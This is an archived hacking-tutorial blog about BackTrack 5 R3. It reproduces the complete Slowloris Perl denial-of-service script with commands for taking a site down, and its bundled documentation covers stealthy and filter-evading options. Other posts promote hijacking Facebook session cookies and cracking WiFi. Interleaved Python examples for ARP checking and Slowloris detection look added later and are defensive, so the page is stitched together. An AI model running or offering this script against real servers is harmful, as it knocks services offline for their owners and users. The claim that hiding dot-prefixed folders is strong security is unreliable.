
Saturday, March 16, 2013

Hijacking Facebook login cookies with Backtrack 5 R3


The video below shows how BackTrack 5 R3 can be used to capture the Facebook session cookies of another user on the same network. A session cookie lets the browser stay logged in to a website without entering the username and password again, so whoever holds a copy of it holds the session.
The video walks through using Nmap, GreaseMonkey and the Cookie Injector script to "steal someone's Facebook account".

The steps are explained in the BackTrack 5 R3 Facebook hacking video below.
This is very dangerous on public networks, whether open or password-protected: anyone on the same network can capture your cookies. Avoid logging in to sensitive accounts in public environments.

How to prevent this

Use a VPN. On a Windows machine you can also add a static ARP entry for the router if you know its MAC address, so that a forged ARP reply cannot redirect your traffic through another machine on the network.
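An added check for the static-ARP advice above (example code, not from the original post): it parses a Windows arp -a listing, assumed to be in the usual three-column format, and reports whether the gateway entry is static, whether its MAC matches the known router MAC, and whether another host is claiming that same MAC. The listing and all MAC addresses below are constructed.

```python
"""Check a Windows ``arp -a`` listing for the conditions a static ARP entry is
meant to prevent. Added example; the sample output is constructed."""
import re
from typing import Dict, List

# Constructed sample of ``arp -a``: the gateway 192.168.1.1 has been re-bound
# to the MAC of 192.168.1.20, and both entries are still dynamic.
SAMPLE_ARP_OUTPUT = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.20          00-11-22-33-44-55     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"      # IPv4 address
    r"([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+"   # MAC in Windows hyphen form
    r"(dynamic|static)\s*$",
    re.IGNORECASE,
)


def parse_arp_table(text: str) -> Dict[str, Dict[str, str]]:
    """Map each IP in the listing to its MAC (lower-case) and entry type."""
    table: Dict[str, Dict[str, str]] = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            ip, mac, kind = m.groups()
            table[ip] = {"mac": mac.lower(), "type": kind.lower()}
    return table


def check_gateway(arp_text: str, gateway_ip: str, expected_mac: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    table = parse_arp_table(arp_text)
    findings: List[str] = []
    entry = table.get(gateway_ip)
    if entry is None:
        findings.append(f"no ARP entry for gateway {gateway_ip}")
        return findings
    if entry["mac"] != expected_mac.lower():
        findings.append(
            f"gateway {gateway_ip} resolves to {entry['mac']}, expected {expected_mac.lower()}"
        )
    if entry["type"] != "static":
        findings.append(f"gateway {gateway_ip} entry is dynamic; a static entry would pin it")
    # One MAC answering for several IPs is the classic footprint of a host
    # that has inserted itself between the victim and the router.
    owners = [ip for ip, e in table.items() if e["mac"] == entry["mac"] and ip != gateway_ip]
    if owners:
        findings.append(f"gateway MAC {entry['mac']} is also claimed by {', '.join(owners)}")
    return findings


if __name__ == "__main__":
    # Constructed "known good" router MAC for the demonstration
    for finding in check_gateway(SAMPLE_ARP_OUTPUT, "192.168.1.1", "AA-BB-CC-DD-EE-01"):
        print(finding)
```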

Saturday, November 10, 2012

DDoS attack with Slowloris in BackTrack 5 R3

DDOS ATTACK WITH BACKTRACK R3 using SLOWLORIS

(EDUCATIONAL PURPOSE ONLY) 


Commands

Download the script (slowloris.pl)

cd into the directory you saved it in

chmod +x slowloris.pl

perl ./slowloris.pl -dns www.site.com -port 80 -timeout 1 -num 1000 -cache

Wait....


Go to your browser and type in the site's address: it is down!





Script: slowloris.pl


#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = 'IGNORE';    # Ignore broken pipe errors

print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT

my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
    'shost=s'   => \$shost,
    'dns=s'     => \$host,
    'httpready' => \$httpready,
    'num=i'     => \$connections,
    'cache'     => \$cache,
    'port=i'    => \$port,
    'https'     => \$ssl,
    'tcpto=i'   => \$tcpto,
    'test'      => \$test,
    'timeout=i' => \$timeout,
    'version'   => \$version,
);

if ($version) {
    print "Version 0.7\n";
    exit;
}

unless ($host) {
    print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
    print "\n\tType 'perldoc $0' for help with options.\n\n";
    exit;
}

unless ($port) {
    $port = 80;
    print "Defaulting to port 80.\n";
}

unless ($tcpto) {
    $tcpto = 5;
    print "Defaulting to a 5 second tcp connection timeout.\n";
}

unless ($test) {
    unless ($timeout) {
        $timeout = 100;
        print "Defaulting to a 100 second re-try timeout.\n";
    }
    unless ($connections) {
        $connections = 1000;
        print "Defaulting to 1000 connections.\n";
    }
}

my $usemultithreading = 0;
if ( $Config{usethreads} ) {
    print "Multithreading enabled.\n";
    $usemultithreading = 1;
    use threads;
    use threads::shared;
}
else {
    print "No multithreading capabilites found!\n";
    print "Slowloris will be slower than normal as a result.\n";
}

# Counters shared between worker threads
my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;

srand() if ($cache);

# -shost puts a different virtual host in the Host: header than the one connected to
if ($shost) {
    $sendhost = $shost;
}
else {
    $sendhost = $host;
}
# -httpready switches the request verb from GET to POST
if ($httpready) {
    $method = "POST";
}
else {
    $method = "GET";
}

if ($test) {
    # Probe the server's header timeout: open one connection, then send a
    # single header line after each of these increasingly long pauses
    my @times = ( "2", "30", "90", "240", "500" );
    my $totaltime = 0;
    foreach (@times) {
        $totaltime = $totaltime + $_;
    }
    $totaltime = $totaltime / 60;
    print "This test could take up to $totaltime minutes.\n";

    my $delay   = 0;
    my $working = 0;
    my $sock;

    if ($ssl) {
        if (
            $sock = new IO::Socket::SSL(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    else {
        if (
            $sock = new IO::Socket::INET(
                PeerAddr => "$host",
                PeerPort => "$port",
                Timeout  => "$tcpto",
                Proto    => "tcp",
            )
          )
        {
            $working = 1;
        }
    }
    if ($working) {
        if ($cache) {
            $rand = "?" . int( rand(99999999999999) );
        }
        else {
            $rand = "";
        }
        my $primarypayload =
            "GET /$rand HTTP/1.1\r\n"
          . "Host: $sendhost\r\n"
          . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
          . "Content-Length: 42\r\n";
        if ( print $sock $primarypayload ) {
            print "Connection successful, now comes the waiting game...\n";
        }
        else {
            print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
            print "Is something wrong?\nDying.\n";
            exit;
        }
    }
    else {
        print "Uhm... I can't connect to $host:$port.\n";
        print "Is something wrong?\nDying.\n";
        exit;
    }
    for ( my $i = 0 ; $i <= $#times ; $i++ ) {
        print "Trying a $times[$i] second delay: \n";
        sleep( $times[$i] );
        if ( print $sock "X-a: b\r\n" ) {
            print "\tWorked.\n";
            $delay = $times[$i];
        }
        else {
            if ( $SIG{__WARN__} ) {
                $delay = $times[ $i - 1 ];
                last;
            }
            print "\tFailed after $times[$i] seconds.\n";
        }
    }

    if ( print $sock "Connection: Close\r\n\r\n" ) {
        print "Okay that's enough time. Slowloris closed the socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    else {
        print "Remote server closed socket.\n";
        print "Use $delay seconds for -timeout.\n";
        exit;
    }
    if ( $delay < 166 ) {
        print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -timeout flag down to less than 10 seconds but it still may not
build the sockets in time.
EOSUCKS2BU
    }
}
else {
    print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";

    if ($usemultithreading) {
        domultithreading($connections);
    }
    else {
        doconnections( $connections, $usemultithreading );
    }
}

sub doconnections {
    my ( $num, $usemultithreading ) = @_;
    my ( @first, @sock, @working );
    my $failedconnections = 0;
    $working[$_] = 0 foreach ( 1 .. $num );    # initializing
    $first[$_]   = 0 foreach ( 1 .. $num );    # initializing
    while (1) {
        $failedconnections = 0;
        print "\t\tBuilding sockets.\n";
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 0 ) {
                if ($ssl) {
                    if (
                        $sock[$z] = new IO::Socket::SSL(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                else {
                    if (
                        $sock[$z] = new IO::Socket::INET(
                            PeerAddr => "$host",
                            PeerPort => "$port",
                            Timeout  => "$tcpto",
                            Proto    => "tcp",
                        )
                      )
                    {
                        $working[$z] = 1;
                        $packetcount = $packetcount + 3;    # SYN, SYN+ACK, ACK
                    }
                    else {
                        $working[$z] = 0;
                    }
                }
                if ( $working[$z] == 1 ) {
                    if ($cache) {
                        $rand = "?" . int( rand(99999999999999) );
                    }
                    else {
                        $rand = "";
                    }
                    # The request is never terminated with a blank line, so
                    # the server keeps waiting for the rest of the headers
                    my $primarypayload =
                        "$method /$rand HTTP/1.1\r\n"
                      . "Host: $sendhost\r\n"
                      . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                      . "Content-Length: 42\r\n";
                    my $handle = $sock[$z];
                    if ($handle) {
                        print $handle "$primarypayload";
                        if ( $SIG{__WARN__} ) {
                            $working[$z] = 0;
                            close $handle;
                            $failed++;
                            $failedconnections++;
                        }
                        else {
                            $packetcount++;
                            $working[$z] = 1;
                        }
                    }
                    else {
                        $working[$z] = 0;
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;
                    $failed++;
                    $failedconnections++;
                }
            }
        }
        print "\t\tSending data.\n";
        # One more bogus header per socket, every $timeout seconds, keeps the
        # server's read timer from expiring
        foreach my $z ( 1 .. $num ) {
            if ( $working[$z] == 1 ) {
                if ( $sock[$z] ) {
                    my $handle = $sock[$z];
                    if ( print $handle "X-a: b\r\n" ) {
                        $working[$z] = 1;
                        $packetcount++;
                    }
                    else {
                        $working[$z] = 0;
                        #debugging info
                        $failed++;
                        $failedconnections++;
                    }
                }
                else {
                    $working[$z] = 0;
                    #debugging info
                    $failed++;
                    $failedconnections++;
                }
            }
        }
        print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
        sleep($timeout);
    }
}

sub domultithreading {
    my ($num) = @_;
    my @thrs;
    my $i                    = 0;
    my $connectionsperthread = 50;
    while ( $i < $num ) {
        $thrs[$i] =
          threads->create( \&doconnections, $connectionsperthread, 1 );
        $i += $connectionsperthread;
    }
    my @threadslist = threads->list();
    while ( $#threadslist > 0 ) {
        $failed = 0;
    }
}

__END__

=head1 TITLE

Slowloris

=head1 VERSION

Version 0.7 Beta

=head1 DATE

06/17/2009

=head1 AUTHOR

RSnake <h@ckers.org> with threading from John Kinsella

=head1 ABSTRACT

Slowloris both helps identify the timeout windows of an HTTP server or proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.

=head1 AFFECTS

Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?

=head1 NOT AFFECTED

IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?

=head1 DESCRIPTION

Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of its threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.

As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.

=head2 Testing

If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:

=head3 Testing Example:

./slowloris.pl -dns www.example.com -port 80 -test

This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).

=head2 HTTP DoS

Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.

=head3 HTTP DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5

=head2 HTTPReady Bypass

HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST versus a GET or HEAD request with the -httpready switch.

=head3 HTTPReady Bypass Example

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready

=head2 Stealth Host DoS

If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a separate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.

=head3 Stealth Host DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com

=head2 HTTPS DoS

Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.

=head3 HTTPS DoS Example:

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

=head2 HTTP Cache

Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.

=head3 HTTP Cache Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache

=head1 Issues

Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscaler devices, in its current incarnation. There may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distributed, although only Netscaler has been tested.

Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it is unlikely that it will be noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.

For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.

Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to its logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.

=head1 What is a slow loris?

What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:

http://www.youtube.com/watch?v=rLdQ3UhLoD4
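Added example (not part of the post or of the Slowloris script): detection logic for the two footprints the script's own Issues section describes. While it runs, the server holds hundreds of ESTABLISHED connections from one client that never complete a request; when it stops, the access log fills with a burst of 400 (Bad Request) lines from that client. Both inputs, an ss -tan listing and Apache combined-format log lines, are constructed for this example.

```python
"""Two checks for Slowloris-style traffic against a web server:
 1. concurrent ESTABLISHED sockets per peer on the HTTP port (during the attack)
 2. a burst of 400 responses from one client (after the sockets close)
Added example; all sample data is constructed."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable

# --- footprint 1: many concurrent half-open HTTP connections from one peer ---

# Constructed 'ss -tan' output: one client holds 6 sockets to port 80.
SAMPLE_SS = (
    "State  Recv-Q Send-Q Local Address:Port Peer Address:Port\n"
    + "".join(f"ESTAB  0      0      10.0.0.5:80        198.51.100.9:{40000 + i}\n" for i in range(6))
    + "ESTAB  0      0      10.0.0.5:80        203.0.113.7:51000\n"
    + "ESTAB  0      0      10.0.0.5:22        203.0.113.7:51001\n"
)


def connections_per_peer(ss_output: str, local_port: int = 80) -> Dict[str, int]:
    """Count ESTABLISHED connections to local_port, keyed by peer IP."""
    counts: Dict[str, int] = defaultdict(int)
    for line in ss_output.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) < 5 or parts[0] != "ESTAB":
            continue
        local, peer = parts[3], parts[4]
        if local.rsplit(":", 1)[1] == str(local_port):
            counts[peer.rsplit(":", 1)[0]] += 1
    return dict(counts)


def peers_over_limit(ss_output: str, limit: int, local_port: int = 80) -> Dict[str, int]:
    """Peers holding more than `limit` sockets (the script defaults to 1000 per host)."""
    return {ip: n for ip, n in connections_per_peer(ss_output, local_port).items() if n > limit}


# --- footprint 2: a burst of 400s from one client when the sockets close ---

LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) ')
APACHE_TS = "%d/%b/%Y:%H:%M:%S %z"

# Constructed Apache combined-format lines; the 400s with an empty request
# line ("-") are what a never-completed Slowloris request turns into.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2012:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Nov/2012:14:09:40 +0000] "-" 400 0 "-" "-"
198.51.100.9 - - [10/Nov/2012:14:09:40 +0000] "-" 400 0 "-" "-"
198.51.100.9 - - [10/Nov/2012:14:09:41 +0000] "-" 400 0 "-" "-"
198.51.100.9 - - [10/Nov/2012:14:09:41 +0000] "-" 400 0 "-" "-"
198.51.100.9 - - [10/Nov/2012:14:09:42 +0000] "-" 400 0 "-" "-"
203.0.113.7 - - [10/Nov/2012:14:09:45 +0000] "GET /broken HTTP/1.1" 400 226 "-" "curl/7.21"
"""


def bursts_of_400(lines: Iterable[str], threshold: int = 4, window: int = 10) -> Dict[str, int]:
    """Clients with at least `threshold` 400s inside any `window`-second span."""
    times_by_ip = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if m and m["status"] == "400":
            times_by_ip[m["ip"]].append(datetime.strptime(m["ts"], APACHE_TS))
    hits: Dict[str, int] = {}
    for ip, times in times_by_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):             # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits


if __name__ == "__main__":
    print("peers over limit:", peers_over_limit(SAMPLE_SS, limit=5))
    print("400 bursts:", bursts_of_400(SAMPLE_LOG.splitlines()))
```

On a live server the inputs come from `ss -tan` and the access log; the thresholds depend on the server's normal per-client concurrency and should be tuned to it.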

Backtrack 5 r3 Cracking Wifi - Fern Wifi Cracker

Crack Wifi password


Thursday, August 23, 2012

Backtrack 5 r3 tutorials | Installing backtrack 5 R3 in virtual machine step by step


In this tutorial I will show you how to install BackTrack 5 R3, which was recently released by the Offensive Security team. If you have installed BackTrack before, you will be familiar with the installation; it is easy and simple, just follow the steps below.


Stage 1 

Requirements
1 : Download the BackTrack ISO from here
2 : Download VMware Workstation or VMware Player
3 : Install either of the above

Stage 2

Installation 

1 : Create a new virtual machine
2 : Choose the installer ISO (the BackTrack 5 ISO)
3 : Choose Linux as the guest operating system type and Ubuntu as the version
4 : Give a name and location for your BackTrack VM
5 : Specify the virtual hard drive size (20 GB is good enough)
6 : Click Finish in the "Ready to create virtual machine" window
7 : Hit ENTER to go to the boot screen, then choose the default text-mode boot and hit ENTER
8 : Hit ENTER again at the next prompt
9 : Type startx to start the GUI (X server)
10 : Click the "Install BackTrack" icon, or open a terminal and type sh -c "ubiquity"
11 : Continue like a normal installation: choose the keyboard type and provide your location
12 : If you are installing only BackTrack, choose to erase and use the entire disk; if you are installing it alongside another OS, specify the partitions accordingly (this tutorial uses a virtual hard drive)
13 : Click Forward, then click Install
14 : Wait until the installation finishes; it can take up to 30 minutes depending on your system


Stage 3
Network configuration
VirtualBox Guest Additions installation
VMware Tools installation
Backup and recovery
Snapshots

Thursday, August 16, 2012

Backtrack r3 tutorials | Upgrade From BackTrack 5 R2 to BackTrack 5 R3

Recently the BackTrack team released the long-awaited BackTrack 5 R3, but for those of you who don't want to start fresh with a new installation, have no fear: you can easily upgrade your existing installation of R2 to R3.
Our primary focus with this release was on the implementation of various bug fixes, numerous tool upgrades and well over 60 new additions to the BackTrack suite. Because of this, the upgrade path to BackTrack 5 R3 is relatively quick and painless.
First, you will want to make sure that your existing system is fully updated:
apt-get update && apt-get dist-upgrade
With the dist-upgrade finished, all that remains is to install the new tools that have been added for R3. An important point to keep in mind is that there are slight differences between the 32-bit and 64-bit tool lists, so make sure you choose the right one.

32-Bit Tools

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

64-Bit Tools

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

Backtrack 5 r3 Tutorials | How to install Backtrack 5 R3

Now I'm going to show you how to install BackTrack 5 R3 on Windows, Linux and Mac.

Watch this video and try it now.



Tuesday, August 14, 2012

Backtrack 5 R3 Facebook Hacking Real!!!

Hi guys,
This video tutorial is about Facebook hacking; it shows how to hack a Facebook account using BackTrack 5 R3.


Don't forget to Join with us on

FACEBOOK FAN PAGE www.facebook.com/sundaravelit

Join Our Group for Help www.facebook.com/groups/hackinghelp

Keep visiting for more BackTrack 5 R3 tutorials.

Backtrack 5 r3 tuts,backtrack 5 tuts,Backtrack 5R3 Tutorials

Hi Friends,
 

"The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection."
This time the BackTrack team has released a single VMware image (GNOME, 32-bit).
For those requiring other VM flavors of BackTrack, building your own VMware image is easy; instructions can be found in the BackTrack Wiki.
"For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all Backtrack HTTP mirrors have synched, which should take a bit more time. Once this happens, the team will update our BackTrack Download page with all links."


BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)
BT5R3-GNOME-32.torrent (md5: aafff8ff5b71fdb6fccdded49a6541a0)
BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f)
BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576)
BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)

"The quieter you become, the more you are able to hear"


Keep visiting for BackTrack 5 R3 tool tutorials.






Wednesday, May 9, 2012

how to uninstall backtrack from hard disk

In this article I am going to show you how you can easily uninstall your BackTrack (3, 4 or 5) from your hard disk when you use it alongside another operating system such as Windows 7 or Windows XP.
So let's start. We need a bootable Windows 7 CD (if you dual-booted with XP, then use an XP bootable disc).

Now put the bootable DVD or pen drive into your system and restart it.

Select the repair Windows option, or press the R key when the installation menu comes up.
Now choose Command Prompt.
Now type
Bootrec.exe /fixmbr
This restores the standard Windows boot menu and removes the Ubuntu GRUB loader.
OK, now boot into your Windows 7 or XP.

AFTER REPAIR:

1. Right-click on My Computer.

2. Select the Manage option (it needs administrator rights).

3. Now click on Device Manager; you can see your BackTrack partitions (they won't carry a name like the C or D drive, but you can identify them by size, for example the 76 GB partition and the 3 GB partition).

4. Delete the volume and reboot your system. Voila, you are done.

5. BackTrack is now uninstalled from your computer.

Wednesday, April 18, 2012

Hide Your Personal Files and Folders in Linux

Steps to hide a file or folder:

1. Open the drive containing the folder.

2. Select the folder and choose Rename, or simply press F2 after selecting it.

3. Rename the folder by putting a “.” (dot) in front of the current name and press ENTER.

4. The folder is now hidden.

Viewing the hidden file or folder:

Proceed as follows to view the folder you have hidden:
1. Navigate to the location of the hidden folder.
2. In the menu bar, click the “View” tab and check the box next to “Show Hidden Files”. This can also be done by simply pressing “Ctrl + H”.

Your hidden folder appears, and you can access it right away. This of course doesn’t change the hidden property of the folder. To re-hide it, click the “View” tab once more and uncheck the box next to “Show Hidden Files”, or press “Ctrl + H” again.

Un-hiding the file or folder:

Un-hiding a hidden file or folder in Linux is a much simpler task. The process is described below:
1. Follow the steps above to view the hidden folder.
2. Once the folder is visible, select Rename once again.
3. Just remove the “.” (dot) you placed at the beginning of the folder’s name and press ENTER.

The folder has been un-hidden.
Hiding a file or a folder is a basic example of the highest level of security that Linux provides its users with. This, and a lot more, makes Linux the “numero uno” operating system for a secure workstation.
